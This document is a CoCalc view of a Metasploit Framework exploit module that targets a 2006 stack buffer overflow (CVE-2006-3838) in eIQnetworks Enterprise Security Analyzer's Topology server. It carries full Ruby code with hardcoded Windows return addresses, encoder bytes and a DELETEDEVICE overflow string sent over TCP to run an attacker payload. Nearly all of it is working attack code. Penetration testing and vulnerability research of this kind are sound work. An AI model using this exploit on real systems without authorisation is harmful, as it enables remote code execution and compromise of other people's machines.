Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/exploits/windows/misc/eiqnetworks_esa_topology.rb
19516 views
1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5
6
class MetasploitModule < Msf::Exploit::Remote
7
Rank = AverageRanking
8
9
include Msf::Exploit::Remote::Tcp
10
11
def initialize(info = {})
12
super(
13
update_info(
14
info,
15
'Name' => 'eIQNetworks ESA Topology DELETEDEVICE Overflow',
16
'Description' => %q{
17
This module exploits a stack buffer overflow in eIQnetworks
18
Enterprise Security Analyzer. During the processing of
19
long arguments to the DELETEDEVICE command in the Topology
20
server, a stack-based buffer overflow occurs.
21
22
This module has only been tested against ESA v2.1.13.
23
},
24
'Author' => 'MC',
25
'References' => [
26
['CVE', '2006-3838'],
27
['OSVDB', '27528'],
28
['BID', '19164'],
29
],
30
'DefaultOptions' => {
31
'EXITFUNC' => 'seh',
32
},
33
'Payload' => {
34
'Space' => 250,
35
'BadChars' => "\x00\x0a\x0d\x20",
36
'PrependEncoder' => "\x81\xc4\xff\xef\xff\xff\x44",
37
},
38
'Platform' => 'win',
39
'Targets' => [
40
[ 'Windows 2000 SP4 English', { 'Ret' => 0x77e14c29 } ],
41
[ 'Windows XP SP2 English', { 'Ret' => 0x77d57447 } ],
42
[ 'Windows 2003 SP1 English', { 'Ret' => 0x773b24da } ],
43
],
44
'Privileged' => false,
45
'DisclosureDate' => '2006-07-25',
46
'Notes' => {
47
'Reliability' => UNKNOWN_RELIABILITY,
48
'Stability' => UNKNOWN_STABILITY,
49
'SideEffects' => UNKNOWN_SIDE_EFFECTS
50
}
51
)
52
)
53
54
register_options(
55
[
56
Opt::RPORT(10628)
57
]
58
)
59
end
60
61
def exploit
62
connect
63
64
print_status("Trying target #{target.name}...")
65
66
filler = rand_text_alphanumeric(128) + [target.ret].pack('V') + make_nops(20)
67
68
sploit = "DELETEDEVICE&" + filler + payload.encoded
69
70
sock.put(sploit)
71
72
handler
73
disconnect
74
end
75
end
76
77